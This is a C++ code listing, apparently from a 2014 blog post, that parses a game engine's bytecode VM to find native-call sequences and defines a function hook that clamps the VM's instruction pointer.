<figure class="highlight c++"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br><span class="line">114</span><br><span class="line">115</span><br><span class="line">116</span><br><span class="line">117</span><br><span class="line">118</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">vector<DWORD> <span class="title">ChcbVM::GetNCallSequence</span><span class="params">(DWORD & offset)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">GetLastNCallSequenceCond</span>(offset,<span class="number">0x01</span>);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function">vector<DWORD> <span class="title">ChcbVM::GetLastNCallSequenceCond</span><span class="params">(DWORD & offset, BYTE bOP)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> vector<DWORD> retVal;</span><br><span class="line"> DWORD ori = bin.<span class="built_in">seek</span>(<span class="number">0</span>,FILE_CURRENT);</span><br><span class="line"> bin.<span class="built_in">seek</span>(offset,FILE_BEGIN);</span><br><span class="line"> WORD tmp1;</span><br><span class="line"> BYTE tmp0;</span><br><span class="line"> <span class="keyword">do</span> </span><br><span class="line"> {</span><br><span class="line"> bin.<span class="built_in">read</span>(&tmp0,<span class="number">1</span>);<span class="comment">//skip initStack</span></span><br><span class="line"> offset++;</span><br><span class="line"> } <span class="keyword">while</span> (tmp0!=<span class="number">0x01</span>);<span class="comment">//从一个函数头开始反编译</span></span><br><span class="line"> bin.<span class="built_in">read</span>(&tmp1,<span class="number">2</span>);<span class="comment">//skip initStack param</span></span><br><span class="line"> offset+=<span class="number">2</span>;</span><br><span class="line"> <span class="keyword">for</span> (BYTE op;;)</span><br><span class="line"> {</span><br><span class="line"> op=bin.<span class="built_in">readb</span>();</span><br><span class="line"> <span class="keyword">if</span> (op == <span class="number">0x2</span>)<span class="comment">//native call</span></span><br><span class="line"> {</span><br><span class="line"> DWORD native = bin.<span class="built_in">readdw</span>();</span><br><span class="line"> retVal.<span class="built_in">push_back</span>(native);</span><br><span class="line"> offset+=<span class="number">5</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (op==<span class="number">0x1</span>)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span> <span class="keyword">if</span> (op==bOP)</span><br><span class="line"> {</span><br><span class="line"> retVal.<span class="built_in">clear</span>();</span><br><span class="line"> offset+=<span class="built_in">vmlde</span>(op);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> offset+=<span class="built_in">vmlde</span>(op);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"></span><br><span class="line"> bin.<span class="built_in">seek</span>(ori,FILE_BEGIN);</span><br><span class="line"></span><br><span class="line"> <span class="keyword">return</span> retVal;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="type">int</span> <span class="title">comp</span><span class="params">(<span class="type">const</span> <span class="type">void</span>* a,<span class="type">const</span> <span class="type">void</span>* b)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">return</span> *(PDWORD)a>*(PDWORD)b;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function">vector<DWORD> <span class="title">ChcbVM::GetNCallList</span><span class="params">(DWORD & offset)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">auto</span> && res = <span class="built_in">GetNCallSequence</span>(offset);</span><br><span class="line"></span><br><span class="line"> <span class="built_in">sort</span>(res.<span class="built_in">begin</span>(),res.<span class="built_in">end</span>());</span><br><span class="line"> vector<DWORD> retVal;</span><br><span class="line"> <span class="keyword">for</span> (<span class="type">size_t</span> idx = <span class="number">0</span>;idx<res.<span class="built_in">size</span>();++idx)</span><br><span class="line"> {</span><br><span class="line"> <span class="keyword">if</span> (*(retVal.<span class="built_in">end</span>()<span class="number">-1</span>)!=res[idx])</span><br><span class="line"> {</span><br><span class="line"> retVal.<span class="built_in">push_back</span>(res[idx]);</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> retVal;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"><span class="function">DWORD <span class="title">ChcbVM::AnalysisPara</span><span class="params">(<span class="type">void</span>)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">auto</span> && res = <span class="built_in">GetLastNCallSequenceCond</span>(hdr.EntryPoint,<span class="number">0x7</span>);<span class="comment">//最后的条件跳转后的calllist</span></span><br><span class="line"> <span class="comment">/*</span></span><br><span class="line"><span class="comment"> 22C85 jz 22C8F</span></span><br><span class="line"><span class="comment"> 22C8A call 233EC;title</span></span><br><span class="line"><span class="comment"> 22C8F call 22CB1;start</span></span><br><span class="line"><span class="comment"> */</span></span><br><span class="line"> DWORD offsetParaDispacher = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">if</span> (res.<span class="built_in">size</span>())</span><br><span class="line"> {</span><br><span class="line"> <span class="type">int</span> idx = <span class="number">1</span>;</span><br><span class="line">search0:</span><br><span class="line"> DWORD offset = res[idx];</span><br><span class="line"> <span class="keyword">auto</span> && res2 = <span class="built_in">GetNCallSequence</span>(offset);<span class="comment">//for most game</span></span><br><span class="line"> <span class="keyword">if</span> (res2.<span class="built_in">size</span>()<=<span class="number">2</span>)</span><br><span class="line"> {</span><br><span class="line"> offsetParaDispacher = *(res2.<span class="built_in">end</span>() - <span class="number">1</span>);</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> {</span><br><span class="line"> ++idx;<span class="comment">//Wiz</span></span><br><span class="line"> <span class="keyword">goto</span> search0;</span><br><span class="line"> }</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">auto</span> && ParaList = <span class="built_in">GetNCallList</span>(offsetParaDispacher);</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">GetNextFuncOffset</span>(*(ParaList.<span class="built_in">end</span>() - <span class="number">1</span>));</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">typedef</span> <span class="title">DWORD</span> <span class="params">(__fastcall __pfnvCall)</span><span class="params">(<span class="type">void</span> *unk1,DWORD unk0)</span></span>;</span><br><span class="line"></span><br><span class="line"><span class="function">DWORD __fastcall <span class="title">vCall</span><span class="params">(</span></span></span><br><span class="line"><span class="params"><span class="function"> <span class="type">void</span> *unk1,<span class="comment">//ecx</span></span></span></span><br><span class="line"><span class="params"><span class="function"> DWORD unk0,<span class="comment">//edx</span></span></span></span><br><span class="line"><span class="params"><span class="function"> DWORD RetAddr,</span></span></span><br><span class="line"><span class="params"><span class="function"> __pfnvCall pfnvCall)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> PDWORD pvIP = <span class="built_in">PDWORD</span>((<span class="type">char</span> *)unk1+offsetvIP);</span><br><span class="line"> <span class="keyword">if</span> (*pvIP>offsetLast)</span><br><span class="line"> {</span><br><span class="line"> *pvIP = offsetLast;</span><br><span class="line"> <span class="keyword">return</span> offsetLast;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="built_in">pfnvCall</span>(unk1,unk0);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line"></span><br></pre></td></tr></table></figure>
2014-02-02T17:43:57.000Z